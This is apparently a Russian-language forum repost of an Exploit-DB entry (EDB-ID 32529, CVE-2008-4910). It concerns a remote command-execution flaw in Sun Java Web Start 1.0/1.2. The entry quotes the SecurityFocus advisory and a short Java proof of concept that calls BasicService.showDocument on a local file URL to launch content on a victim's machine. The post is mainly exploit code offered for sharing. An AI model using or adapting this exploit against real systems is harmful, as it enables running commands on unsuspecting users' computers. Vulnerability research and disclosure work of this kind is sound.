Exploit Sun Java Web Start 1.0/1.2 - Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32529
Проверка EDB
  1. Пройдено
Автор
VARUN SRIVASTAVA
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2008-4910
Дата публикации
2008-10-25
Java:
source: https://www.securityfocus.com/bid/31916/info

Sun Java Web Start is prone to a remote command-execution vulnerability.

Successful exploits may allow attackers to execute arbitrary commands on an unsuspecting user's computer. This may aid in further attacks.

We don't know which versions of Java Web Start are affected. We will update this BID when more information is released. 

BasicService basicService = (BasicService)    ServiceManager.lookup("javax.jnlp.BasicService");

URL mike = new URL("file:\\C:\\music.rm");

basicService.showDocument(mike);
 
Источник
www.exploit-db.com

Похожие темы